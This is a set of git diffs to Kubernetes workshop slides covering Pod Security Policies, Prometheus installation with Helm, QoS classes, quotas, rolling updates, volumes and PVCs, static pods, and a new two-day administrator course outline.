## Enabling Pod Security Policies
|
||||
|
||||
- To enable Pod Security Policies, we need to enable their *admission plugin*
|
||||
|
||||
- This is done by adding a flag to the API server
|
||||
|
||||
- On clusters deployed with `kubeadm`, the control plane runs in static pods
|
||||
|
||||
- These pods are defined in YAML files located in `/etc/kubernetes/manifests`
|
||||
|
||||
- Kubelet watches this directory
|
||||
|
||||
- Each time a file is added/removed there, kubelet creates/deletes the corresponding pod
|
||||
|
||||
- Updating a file causes the pod to be deleted and recreated
|
||||
|
||||
---
|
||||
|
||||
## Updating the API server flags
|
||||
|
||||
- Let's edit the manifest for the API server pod
|
||||
|
||||
.exercise[
|
||||
|
||||
- Have a look at the static pods:
|
||||
```bash
|
||||
ls -l /etc/kubernetes/manifests
|
||||
```
|
||||
|
||||
- Edit the one corresponding to the API server:
|
||||
```bash
|
||||
sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Adding the PSP admission plugin
|
||||
|
||||
- There should already be a line with `--enable-admission-plugins=...`
|
||||
|
||||
- Let's add `PodSecurityPolicy` on that line
|
||||
|
||||
.exercise[
|
||||
|
||||
- Locate the line with `--enable-admission-plugins=`
|
||||
|
||||
- Add `PodSecurityPolicy`
|
||||
|
||||
It should read: `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy`
|
||||
|
||||
- Save, quit
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Waiting for the API server to restart
|
||||
|
||||
- The kubelet detects that the file was modified
|
||||
|
||||
- It kills the API server pod, and starts a new one
|
||||
|
||||
- During that time, the API server is unavailable
|
||||
|
||||
.exercise[
|
||||
|
||||
- Wait until the API server is available again
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Check that the admission plugin is active
|
||||
|
||||
- Normally, we can't create any Pod at this point
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp1 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Try to create a Deployment:
|
||||
```bash
|
||||
kubectl run testpsp2 --image=nginx
|
||||
```
|
||||
|
||||
- Look at existing resources:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
We can get hints about what's happening by looking at the ReplicaSet and Events.
|
||||
|
||||
---
|
||||
|
||||
## Introducing our Pod Security Policies
|
||||
|
||||
- We will create two policies:
|
||||
|
||||
- privileged (allows everything)
|
||||
|
||||
- restricted (blocks some unsafe mechanisms)
|
||||
|
||||
- For each policy, we also need an associated ClusterRole granting *use*
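- A sketch of what such a ClusterRole could look like (the actual files may differ):
  ```yaml
  apiVersion: rbac.authorization.k8s.io/v1
  kind: ClusterRole
  metadata:
    name: psp:restricted
  rules:
  - apiGroups: [ policy ]
    resources: [ podsecuritypolicies ]
    resourceNames: [ restricted ]
    verbs: [ use ]
  ```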
|
||||
|
||||
---
|
||||
|
||||
## Creating our Pod Security Policies
|
||||
|
||||
- We have a couple of files, each defining a PSP and associated ClusterRole:
|
||||
|
||||
- k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged`
|
||||
- k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create both policies and their associated ClusterRoles:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/psp-restricted.yaml
|
||||
kubectl create -f ~/container.training/k8s/psp-privileged.yaml
|
||||
```
|
||||
]
|
||||
|
||||
- The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies)
|
||||
|
||||
- The restricted policy is inspired by that same documentation page
|
||||
|
||||
---
|
||||
|
||||
## Check that we can create Pods again
|
||||
|
||||
- We haven't bound the policy to any user yet
|
||||
|
||||
- But `cluster-admin` can implicitly `use` all policies
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we can now create a Pod directly:
|
||||
```bash
|
||||
kubectl run testpsp3 --image=nginx --restart=Never
|
||||
```
|
||||
|
||||
- Create a Deployment as well:
|
||||
```bash
|
||||
kubectl run testpsp4 --image=nginx
|
||||
```
|
||||
|
||||
- Confirm that the Deployment is *not* creating any Pods:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's going on?
|
||||
|
||||
- We can create Pods directly (thanks to our root-like permissions)
|
||||
|
||||
- The Pods corresponding to a Deployment are created by the ReplicaSet controller
|
||||
|
||||
- The ReplicaSet controller does *not* have root-like permissions
|
||||
|
||||
- We need to either:
|
||||
|
||||
- grant permissions to the ReplicaSet controller
|
||||
|
||||
*or*
|
||||
|
||||
- grant permissions to our Pods' ServiceAccount
|
||||
|
||||
- The first option would allow *anyone* to create pods
|
||||
|
||||
- The second option will allow us to scope the permissions better
|
||||
|
||||
---
|
||||
|
||||
## Binding the restricted policy
|
||||
|
||||
- Let's bind the role `psp:restricted` to ServiceAccount `green:default`
|
||||
|
||||
(aka the default ServiceAccount in the green Namespace)
|
||||
|
||||
- This will allow Pod creation in the green Namespace
|
||||
|
||||
(because these Pods will be using that ServiceAccount automatically)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the following RoleBinding:
|
||||
```bash
|
||||
kubectl create rolebinding psp:restricted \
|
||||
--clusterrole=psp:restricted \
|
||||
--serviceaccount=green:default
|
||||
```
|
||||
|
||||
]
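The YAML equivalent of that RoleBinding would look roughly like this sketch, matching the `kubectl` command above:

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: psp:restricted
  namespace: green
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: psp:restricted
subjects:
- kind: ServiceAccount
  name: default
  namespace: green
```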
|
||||
|
||||
---
|
||||
|
||||
## Trying it out
|
||||
|
||||
- The Deployments that we created earlier will *eventually* recover
|
||||
|
||||
(the ReplicaSet controller will retry creating Pods every once in a while)
|
||||
|
||||
- If we create a new Deployment now, it should work immediately
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a simple Deployment:
|
||||
```bash
|
||||
kubectl create deployment testpsp5 --image=nginx
|
||||
```
|
||||
|
||||
- Look at the Pods that have been created:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Trying to hack the cluster
|
||||
|
||||
- Let's create the same DaemonSet we used earlier
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a hostile DaemonSet:
|
||||
```bash
|
||||
kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
|
||||
```
|
||||
|
||||
- Look at the state of the namespace:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## What's in our restricted policy?
|
||||
|
||||
- The restricted PSP is similar to the one provided in the docs, but:
|
||||
|
||||
- it allows containers to run as root
|
||||
|
||||
- it doesn't drop capabilities
|
||||
|
||||
- Many containers run as root by default, and would require additional tweaks
|
||||
|
||||
- Many containers use e.g. `chown`, which requires a specific capability
|
||||
|
||||
(that's the case for the NGINX official image, for instance)
|
||||
|
||||
- We still block: hostPath, privileged containers, and much more!
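- The actual `k8s/psp-restricted.yaml` may differ, but a policy consistent with this description could look like:
  ```yaml
  apiVersion: policy/v1beta1
  kind: PodSecurityPolicy
  metadata:
    name: restricted
  spec:
    privileged: false  # no privileged containers
    hostNetwork: false
    hostIPC: false
    hostPID: false
    runAsUser:
      rule: RunAsAny   # root is still allowed
    seLinux:
      rule: RunAsAny
    supplementalGroups:
      rule: RunAsAny
    fsGroup:
      rule: RunAsAny
    volumes:           # note: hostPath is *not* in this list
    - configMap
    - emptyDir
    - secret
    - downwardAPI
    - projected
    - persistentVolumeClaim
  ```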
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The case of static pods
|
||||
|
||||
- If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing
|
||||
|
||||
- However, the API server is obviously running
|
||||
|
||||
(otherwise, `kubectl get pods --namespace=kube-system` wouldn't work)
|
||||
|
||||
- The API server Pod is created directly by kubelet
|
||||
|
||||
(without going through the PSP admission plugin)
|
||||
|
||||
- Then, kubelet creates a "mirror pod" representing that Pod in etcd
|
||||
|
||||
- That "mirror pod" creation goes through the PSP admission plugin
|
||||
|
||||
- And it gets blocked!
|
||||
|
||||
- This can be fixed by binding `psp:privileged` to group `system:nodes`
|
||||
|
||||
---
|
||||
|
||||
## .warning[Before moving on...]
|
||||
|
||||
- Our cluster is currently broken
|
||||
|
||||
(we can't create pods in namespaces kube-system, default, ...)
|
||||
|
||||
- We need to either:
|
||||
|
||||
- disable the PSP admission plugin
|
||||
|
||||
- allow use of PSP to relevant users and groups
|
||||
|
||||
- For instance, we could:
|
||||
|
||||
- bind `psp:restricted` to the group `system:authenticated`
|
||||
|
||||
- bind `psp:privileged` to the ServiceAccount `kube-system:default`
|
||||
@@ -12,7 +12,7 @@
|
||||
|
||||
- an *alert manager* to notify us according to metrics values or trends
|
||||
|
||||
- We are going to deploy it on our Kubernetes cluster and see how to query it
|
||||
- We are going to use it to collect and query some metrics on our Kubernetes cluster
|
||||
|
||||
---
|
||||
|
||||
@@ -20,7 +20,7 @@
|
||||
|
||||
- We don't endorse Prometheus more or less than any other system
|
||||
|
||||
- It's relatively well integrated within the Cloud Native ecosystem
|
||||
- It's relatively well integrated within the cloud-native ecosystem
|
||||
|
||||
- It can be self-hosted (this is useful for tutorials like this)
|
||||
|
||||
@@ -145,7 +145,28 @@ scrape_configs:
|
||||
|
||||
(it will even be gentler on the I/O subsystem since it needs to write less)
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
- Would you like to know more? Check this video:
|
||||
|
||||
[Storage in Prometheus 2.0](https://www.youtube.com/watch?v=C4YV-9CrawA) by [Goutham V](https://twitter.com/putadent) at DC17EU
|
||||
|
||||
---
|
||||
|
||||
## Checking if Prometheus is installed
|
||||
|
||||
- Before trying to install Prometheus, let's check if it's already there
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look for services with a label `app=prometheus` across all namespaces:
|
||||
```bash
|
||||
kubectl get services --selector=app=prometheus --all-namespaces
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
If we see a `NodePort` service called `prometheus-server`, we're good!
|
||||
|
||||
(We can then skip to "Connecting to the Prometheus web UI".)
|
||||
|
||||
---
|
||||
|
||||
@@ -161,7 +182,7 @@ We need to:
|
||||
|
||||
- Run the *node exporter* on each node (with a Daemon Set)
|
||||
|
||||
- Setup a Service Account so that Prometheus can query the Kubernetes API
|
||||
- Set up a Service Account so that Prometheus can query the Kubernetes API
|
||||
|
||||
- Configure the Prometheus server
|
||||
|
||||
@@ -169,11 +190,11 @@ We need to:
|
||||
|
||||
---
|
||||
|
||||
## Helm Charts to the rescue
|
||||
## Helm charts to the rescue
|
||||
|
||||
- To make our lives easier, we are going to use a Helm Chart
|
||||
- To make our lives easier, we are going to use a Helm chart
|
||||
|
||||
- The Helm Chart will take care of all the steps explained above
|
||||
- The Helm chart will take care of all the steps explained above
|
||||
|
||||
(including some extra features that we don't need, but won't hurt)
|
||||
|
||||
@@ -210,20 +231,41 @@ We need to:

- Install Prometheus on our cluster:
  ```bash
- helm install stable/prometheus \
-      --set server.service.type=NodePort \
-      --set server.persistentVolume.enabled=false
+ helm upgrade prometheus stable/prometheus \
+      --install \
+      --namespace kube-system \
+      --set server.service.type=NodePort \
+      --set server.service.nodePort=30090 \
+      --set server.persistentVolume.enabled=false \
+      --set alertmanager.enabled=false
  ```

]

-The provided flags:
+Curious about all these flags? They're explained in the next slide.

-- expose the server web UI (and API) on a NodePort
+---

-- use an ephemeral volume for metrics storage
-  <br/>
-  (instead of requesting a Persistent Volume through a Persistent Volume Claim)
+class: extra-details
+
+## Explaining all the Helm flags
+
+- `helm upgrade prometheus` → upgrade release "prometheus" to the latest version...
+
+  (a "release" is a unique name given to an app deployed with Helm)
+
+- `stable/prometheus` → ... of the chart `prometheus` in repo `stable`
+
+- `--install` → if the app doesn't exist, create it
+
+- `--namespace kube-system` → put it in that specific namespace
+
+- And set the following *values* when rendering the chart's templates:
+
+  - `server.service.type=NodePort` → expose the Prometheus server with a NodePort
+
+  - `server.service.nodePort=30090` → set the specific NodePort number to use
+
+  - `server.persistentVolume.enabled=false` → do not use a PersistentVolumeClaim
+
+  - `alertmanager.enabled=false` → disable the alert manager entirely
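As an aside (a sketch, not part of the original exercise), the same values could be kept in a file and passed with `-f prom-values.yaml` instead of the `--set` flags; the file name is hypothetical:

```yaml
# prom-values.yaml (hypothetical file name)
# Equivalent to the --set flags used above
server:
  service:
    type: NodePort
    nodePort: 30090
  persistentVolume:
    enabled: false
alertmanager:
  enabled: false
```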
---

@@ -235,7 +277,7 @@ The provided flags:

- Figure out the NodePort that was allocated to the Prometheus server:
  ```bash
- kubectl get svc | grep prometheus-server
+ kubectl get svc --all-namespaces | grep prometheus-server
  ```

- With your browser, connect to that port
@@ -246,7 +288,7 @@ The provided flags:

## Querying some metrics

-- This is easy ... if you are familiar with PromQL
+- This is easy... if you are familiar with PromQL

.exercise[
@@ -292,13 +334,13 @@ This query will show us CPU usage across all containers:

```
container_cpu_usage_seconds_total
```

- The suffix of the metrics name tells us:

  - the unit (seconds of CPU)

  - that it's the total used since the container creation

-- Since it's a "total", it is an increasing quantity
+- Since it's a "total," it is an increasing quantity

  (we need to compute the derivative if we want e.g. CPU % over time)
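For example, PromQL's `rate()` function computes that derivative over a sliding window; the query below (a sketch building on the metric shown above) gives per-container CPU usage, in fractional cores, averaged over the last 5 minutes:

```
rate(container_cpu_usage_seconds_total[5m])
```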
@@ -391,9 +433,9 @@ class: extra-details

- I/O activity (disk, network), per operation or volume

-- Physical/hardware (when applicable): temperature, fan speed ...
+- Physical/hardware (when applicable): temperature, fan speed...

-- ... and much more!
+- ...and much more!

---
@@ -406,7 +448,7 @@ class: extra-details

- RAM breakdown will be different

  - active vs inactive memory
-  - some memory is *shared* between containers, and accounted specially
+  - some memory is *shared* between containers, and specially accounted for

- I/O activity is also harder to track
@@ -425,11 +467,11 @@ class: extra-details

- Arbitrary metrics related to your application and business

-- System performance: request latency, error rate ...
+- System performance: request latency, error rate...

-- Volume information: number of rows in database, message queue size ...
+- Volume information: number of rows in database, message queue size...

-- Business data: inventory, items sold, revenue ...
+- Business data: inventory, items sold, revenue...

---
@@ -453,7 +495,7 @@ class: extra-details

## Querying labels

-- What if we want to get metrics for containers belong to pod tagged `worker`?
+- What if we want to get metrics for containers belonging to a pod tagged `worker`?

- The cAdvisor exporter does not give us Kubernetes labels

@@ -486,3 +528,21 @@ class: extra-details

- see [this comment](https://github.com/prometheus/prometheus/issues/2204#issuecomment-261515520) for an overview

- or [this blog post](https://5pi.de/2017/11/09/use-prometheus-vector-matching-to-get-kubernetes-utilization-across-any-pod-label/) for a complete description of the process
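To give a rough idea of what such a join looks like (a sketch only: it assumes kube-state-metrics is deployed, that it exposes a `kube_pod_labels` metric, and that both sides share a `pod` label; label names vary across versions and configurations):

```
sum by (pod) (rate(container_cpu_usage_seconds_total[5m]))
  * on (pod) group_left(label_app)
kube_pod_labels
```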
---

## In practice

- Grafana is a beautiful (and useful) frontend to display all kinds of graphs

- Not everyone needs to know Prometheus, PromQL, Grafana, etc.

- But in a team, it is valuable to have at least one person who knows them

- That person can set up queries and dashboards for the rest of the team

- It's a little bit like knowing how to optimize SQL queries, Dockerfiles...

Don't panic if you don't know these tools!

...But make sure at least one person in your team is on it 💯
@@ -86,17 +86,17 @@ Each pod is assigned a QoS class (visible in `status.qosClass`).

- as long as the container uses less than the limit, it won't be affected

-- if all containers in a pod have *(limits=requests)*, QoS is "Guaranteed"
+- if all containers in a pod have *(limits=requests)*, QoS is considered "Guaranteed"

- If requests < limits:

  - as long as the container uses less than the request, it won't be affected

-  - otherwise, it might be killed / evicted if the node gets overloaded
+  - otherwise, it might be killed/evicted if the node gets overloaded

-- if at least one container has *(requests<limits)*, QoS is "Burstable"
+- if at least one container has *(requests<limits)*, QoS is considered "Burstable"

-- If a pod doesn't have any request nor limit, QoS is "BestEffort"
+- If a pod doesn't have any request nor limit, QoS is considered "BestEffort"
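For instance, here is a hypothetical single-container pod that would be classified as "Guaranteed", since its requests and limits are equal:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: qos-demo        # hypothetical name
spec:
  containers:
  - name: app
    image: nginx
    resources:
      requests:         # requests == limits → QoS class "Guaranteed"
        cpu: 100m
        memory: 128Mi
      limits:
        cpu: 100m
        memory: 128Mi
```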
---

@@ -392,7 +392,7 @@ These quotas will apply to the namespace where the ResourceQuota is created.

  count/roles.rbac.authorization.k8s.io: 10
  ```

-(The `count/` syntax allows to limit arbitrary objects, including CRDs.)
+(The `count/` syntax allows limiting arbitrary objects, including CRDs.)
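For context, a complete (hypothetical) ResourceQuota using that syntax could look like this:

```yaml
apiVersion: v1
kind: ResourceQuota
metadata:
  name: object-counts   # hypothetical name
spec:
  hard:
    count/roles.rbac.authorization.k8s.io: "10"
```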
---

@@ -400,7 +400,7 @@ These quotas will apply to the namespace where the ResourceQuota is created.

- Quotas can be created with a YAML definition

-- ... Or with the `kubectl create quota` command
+- ...Or with the `kubectl create quota` command

- Example:
  ```bash
@@ -5,9 +5,9 @@

- new pods are created

- old pods are terminated

- ... all at the same time

- if something goes wrong, ¯\\\_(ツ)\_/¯

---

@@ -28,7 +28,7 @@

- there will therefore be up to `maxUnavailable`+`maxSurge` pods being updated

-- We have the possibility to rollback to the previous version
+- We have the possibility of rolling back to the previous version
  <br/>(if the update fails or is unsatisfactory in any way)
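The `maxUnavailable` and `maxSurge` parameters above live in the Deployment manifest; a minimal sketch (the values shown are the Kubernetes defaults, for illustration):

```yaml
spec:
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 25%   # how many pods may be missing during the update
      maxSurge: 25%         # how many extra pods may be created during the update
```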
---

@@ -49,7 +49,6 @@

---

## Rolling updates in practice

- As of Kubernetes 1.8, we can do rolling updates with:

@@ -64,12 +63,15 @@

## Building a new version of the `worker` service

.warning[
Only run these commands if you have built and pushed DockerCoins to a local registry.
<br/>
If you are using images from the Docker Hub (`dockercoins/worker:v0.1`), skip this.
]

.exercise[

-- Go to the `stack` directory:
-  ```bash
-  cd ~/container.training/stacks
-  ```
+- Go to the `stacks` directory (`~/container.training/stacks`)

- Edit `dockercoins/worker/worker.py`; update the first `sleep` line to sleep 1 second
@@ -210,7 +212,7 @@ class: extra-details

## Checking the dashboard during the bad rollout

-If you haven't deployed the Kubernetes dashboard earlier, just skip this slide.
+If you didn't deploy the Kubernetes dashboard earlier, just skip this slide.

.exercise[

@@ -253,7 +255,7 @@ Note the `3xxxx` port.

  ```
-->

-- Cancel the deployment and wait for the dust to settle down:
+- Cancel the deployment and wait for the dust to settle:
  ```bash
  kubectl rollout undo deploy worker
  kubectl rollout status deploy worker
@@ -90,4 +90,4 @@

- For a longer list, check the Kubernetes documentation:
  <br/>
-  it has a great guide to [pick the right solution](https://kubernetes.io/docs/setup/pick-right-solution/) to set up Kubernetes.
+  it has a great guide to [pick the right solution](https://kubernetes.io/docs/setup/#production-environment) to set up Kubernetes.

@@ -20,7 +20,7 @@ with a cloud provider

## EKS (the hard way)

-- [Read the doc](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html)
+- [Read the doc](https://docs.aws.amazon.com/eks/latest/userguide/getting-started-console.html)

- Create service roles, VPCs, and a bunch of other oddities

@@ -69,6 +69,8 @@ with a cloud provider

  eksctl get clusters
  ```

+.footnote[Note: the AWS documentation has been updated and now includes [eksctl instructions](https://docs.aws.amazon.com/eks/latest/userguide/getting-started-eksctl.html).]

---

## GKE (initial setup)
@@ -34,13 +34,13 @@

- Each pod can discover the IP address of the others easily

-- The pods can have persistent volumes attached to them
+- The pods can persist data on attached volumes

🤔 Wait a minute... Can't we already attach volumes to pods and deployments?

---
-## Volumes and Persistent Volumes
+## Revisiting volumes

- [Volumes](https://kubernetes.io/docs/concepts/storage/volumes/) are used for many purposes:

@@ -50,13 +50,13 @@

  - accessing storage systems

-- The last type of volumes is known as a "Persistent Volume"
+- Let's see examples of the latter usage

---

-## Persistent Volumes types
+## Volume types

-- There are many [types of Persistent Volumes](https://kubernetes.io/docs/concepts/storage/persistent-volumes/#types-of-persistent-volumes) available:
+- There are many [types of volumes](https://kubernetes.io/docs/concepts/storage/volumes/#types-of-volumes) available:

  - public cloud storage (GCEPersistentDisk, AWSElasticBlockStore, AzureDisk...)
@@ -74,7 +74,7 @@

---

-## Using a Persistent Volume
+## Using a cloud volume

Here is a pod definition using an AWS EBS volume (that has to be created first):

@@ -99,7 +99,32 @@ spec:

---

-## Shortcomings of Persistent Volumes
+## Using an NFS volume

Here is another example using a volume on an NFS server:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: pod-using-my-nfs-volume
spec:
  containers:
  - image: ...
    name: container-using-my-nfs-volume
    volumeMounts:
    - mountPath: /my-nfs
      name: my-nfs-volume
  volumes:
  - name: my-nfs-volume
    nfs:
      server: 192.168.0.55
      path: "/exports/assets"
```

---

## Shortcomings of volumes

- Their lifecycle (creation, deletion...) is managed outside of the Kubernetes API
@@ -125,17 +150,47 @@ spec:

-- This type is a *Persistent Volume Claim*
+- A Persistent Volume Claim (PVC) is a resource type

  (visible with `kubectl get persistentvolumeclaims` or `kubectl get pvc`)

- A PVC is not a volume; it is a *request for a volume*

---

## Persistent Volume Claims in practice

- Using a Persistent Volume Claim is a two-step process:

  - creating the claim

  - using the claim in a pod (as if it were any other kind of volume)

-- Between these two steps, something will happen behind the scenes:
+- A PVC starts by being Unbound (without an associated volume)

-  - Kubernetes will associate an existing volume with the claim
+- Once it is associated with a Persistent Volume, it becomes Bound

-  - ... or dynamically create a volume if possible and necessary
+- A Pod referring to an unbound PVC will not start

  (but as soon as the PVC is bound, the Pod can start)
---

## Binding PV and PVC

- A Kubernetes controller continuously watches PV and PVC objects

- When it notices an unbound PVC, it tries to find a satisfactory PV

  ("satisfactory" in terms of size and other characteristics; see next slide)

- If no PV fits the PVC, a PV can be created dynamically

  (this requires configuring a *dynamic provisioner*; more on that later)

- Otherwise, the PVC remains unbound indefinitely

  (until we manually create a PV or set up dynamic provisioning)

---
@@ -147,7 +202,9 @@ spec:

- the access mode (e.g. "read-write by a single pod")

-- It can also give extra details, like:
+- Optionally, it can also specify a Storage Class

- The Storage Class indicates:

  - which storage system to use (e.g. Portworx, EBS...)

@@ -155,8 +212,6 @@ spec:

  e.g.: "replicate the data 3 times, and use SSD media"

-- The extra details are provided by specifying a Storage Class
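Putting these fields together, a minimal claim could look like this (a sketch; the name and size are hypothetical, and `storageClassName` is optional):

```yaml
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-claim            # hypothetical name
spec:
  accessModes:
  - ReadWriteOnce           # read-write, mounted on a single node at a time
  resources:
    requests:
      storage: 1Gi
  #storageClassName: my-storage-class
```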
---

## What's a Storage Class?

@@ -167,15 +222,15 @@ spec:

- It indicates which *provisioner* to use

  (which controller will create the actual volume)

- And arbitrary parameters for that provisioner

  (replication levels, type of disk... anything relevant!)

-- It is necessary to define a Storage Class to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)
+- Storage Classes are required if we want to use [dynamic provisioning](https://kubernetes.io/docs/concepts/storage/dynamic-provisioning/)

-- Conversely, it is not necessary to define one if you will create volumes manually

-  (we will see dynamic provisioning in action later)
+  (but we can also create volumes manually, and ignore Storage Classes)
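For example, a Storage Class for the in-tree EBS provisioner might look like this (a sketch; the class name is hypothetical, and the parameters are specific to each provisioner):

```yaml
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: fast                        # hypothetical name
provisioner: kubernetes.io/aws-ebs  # which controller creates the volumes
parameters:
  type: gp2                         # provisioner-specific parameter
```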
---

@@ -200,7 +255,7 @@ spec:

## Using a Persistent Volume Claim

-Here is the same definition as earlier, but using a PVC:
+Here is a Pod definition like the ones shown earlier, but using a PVC:

```yaml
apiVersion: v1

@@ -212,7 +267,7 @@ spec:

  - image: ...
    name: container-using-a-claim
    volumeMounts:
-    - mountPath: /my-ebs
+    - mountPath: /my-vol
      name: my-volume
  volumes:
  - name: my-volume
@@ -18,7 +18,7 @@

## A possible approach

-- Since each component of the control plane can be replicated ...
+- Since each component of the control plane can be replicated...

- We could set up the control plane outside of the cluster

@@ -39,9 +39,9 @@

- Worst case scenario, we might need to:

  - set up a new control plane (outside of the cluster)

  - restore a backup from the old control plane

  - move the new control plane to the cluster (again)

- This doesn't sound like a great experience
@@ -57,12 +57,12 @@

- The kubelet can also get a list of *static pods* from:

  - a directory containing one (or multiple) *manifests*, and/or

  - a URL (serving a *manifest*)

- These "manifests" are basically YAML definitions

-  (As produced by `kubectl get pod my-little-pod -o yaml --export`)
+  (As produced by `kubectl get pod my-little-pod -o yaml`)
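For the curious, a sketch of where such manifests typically live: the directory is set by the kubelet's `--pod-manifest-path` flag (or the `staticPodPath` field of its configuration file), and `/etc/kubernetes/manifests` is the kubeadm convention:

```bash
# List the static pod manifests on a node (path may differ on your cluster)
ls /etc/kubernetes/manifests
```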
---

@@ -100,11 +100,11 @@

## Static pods vs normal pods

-- The API only gives us a read-only access to static pods
+- The API only gives us read-only access to static pods

-- We can `kubectl delete` a static pod ...
+- We can `kubectl delete` a static pod...

-  ... But the kubelet will restart it immediately
+  ...But the kubelet will re-mirror it immediately

- Static pods can be selected just like other pods
@@ -1,7 +1,7 @@

## Versions installed

-- Kubernetes 1.14.1
-- Docker Engine 18.09.5
+- Kubernetes 1.15.0
+- Docker Engine 18.09.6
- Docker Compose 1.21.1

<!-- ##VERSION## -->

@@ -23,13 +23,13 @@ class: extra-details

## Kubernetes and Docker compatibility

-- Kubernetes 1.14 validates Docker Engine versions [up to 18.09](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.14.md#external-dependencies)
+- Kubernetes 1.15 validates Docker Engine versions [up to 18.09](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.15.md#dependencies)
  <br/>
  (the latest version when Kubernetes 1.14 was released)

- Kubernetes 1.13 only validates Docker Engine versions [up to 18.06](https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md#external-dependencies)

-- Is this a problem if I use Kubernetes with a "too recent" Docker Engine?
+- Is it a problem if I use Kubernetes with a "too recent" Docker Engine?

--
@@ -18,6 +18,8 @@

---

+class: extra-details
+
## Kubernetes volumes vs. Docker volumes

- Kubernetes and Docker volumes are very similar

@@ -26,22 +28,44 @@

  <br/>
  but it refers to Docker 1.7, which was released in 2015!)

-- Docker volumes allow to share data between containers running on the same host
+- Docker volumes allow us to share data between containers running on the same host

- Kubernetes volumes allow us to share data between containers in the same pod

-- Both Docker and Kubernetes volumes allow us access to storage systems
+- Both Docker and Kubernetes volumes enable access to storage systems

- Kubernetes volumes are also used to expose configuration and secrets

- Docker has specific concepts for configuration and secrets

  <br/>
  (but under the hood, the technical implementation is similar)

- If you're not familiar with Docker volumes, you can safely ignore this slide!

---

## Volumes ≠ Persistent Volumes

- Volumes and Persistent Volumes are related, but very different!

- *Volumes*:

  - appear in Pod specifications (see next slide)

  - do not exist as API resources (**cannot** do `kubectl get volumes`)

- *Persistent Volumes*:

  - are API resources (**can** do `kubectl get persistentvolumes`)

  - correspond to concrete volumes (e.g. on a SAN, EBS, etc.)

  - cannot be associated with a Pod directly; but through a Persistent Volume Claim

  - won't be discussed further in this section

---

## A simple volume example

```yaml
@@ -132,6 +132,8 @@ And *then* it is time to look at orchestration!

  [Persistent Volumes](kube-selfpaced.yml.html#toc-highly-available-persistent-volumes)

+- Excellent [blog post](http://www.databasesoup.com/2018/07/should-i-run-postgres-on-kubernetes.html) tackling the question: “Should I run Postgres on Kubernetes?”

---

## HTTP traffic handling
@@ -38,6 +38,7 @@ chapters:

- - k8s/resource-limits.md
- k8s/metrics-server.md
+- k8s/cluster-sizing.md
- k8s/horizontal-pod-autoscaler.md
- - k8s/lastwords-admin.md
- k8s/links.md
- shared/thankyou.md

slides/kadm-twodays.yml (new file, 69 lines)
@@ -0,0 +1,69 @@
title: |
  Kubernetes
  for administrators
  and operators

#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
chat: "In person!"

gitrepo: github.com/jpetazzo/container.training

slides: http://container.training/

exclude:
- self-paced

chapters:
- shared/title.md
- logistics.md
- k8s/intro.md
- shared/about-slides.md
- shared/toc.md
# DAY 1
- - k8s/prereqs-admin.md
  - k8s/architecture.md
  - k8s/deploymentslideshow.md
  - k8s/dmuc.md
- - k8s/multinode.md
  - k8s/cni.md
- - k8s/apilb.md
  - k8s/setup-managed.md
  - k8s/setup-selfhosted.md
  - k8s/cluster-upgrade.md
  - k8s/staticpods.md
- - k8s/cluster-backup.md
  - k8s/cloud-controller-manager.md
  - k8s/healthchecks.md
  - k8s/healthchecks-more.md
# DAY 2
- - k8s/kubercoins.md
  - k8s/logs-cli.md
  - k8s/logs-centralized.md
  - k8s/authn-authz.md
  - k8s/csr-api.md
- - k8s/openid-connect.md
  - k8s/control-plane-auth.md
  ###- k8s/bootstrap.md
  - k8s/netpol.md
  - k8s/podsecuritypolicy.md
- - k8s/resource-limits.md
  - k8s/metrics-server.md
  - k8s/cluster-sizing.md
  - k8s/horizontal-pod-autoscaler.md
- - k8s/prometheus.md
  - k8s/extending-api.md
  - k8s/operators.md
  ###- k8s/operators-design.md
# CONCLUSION
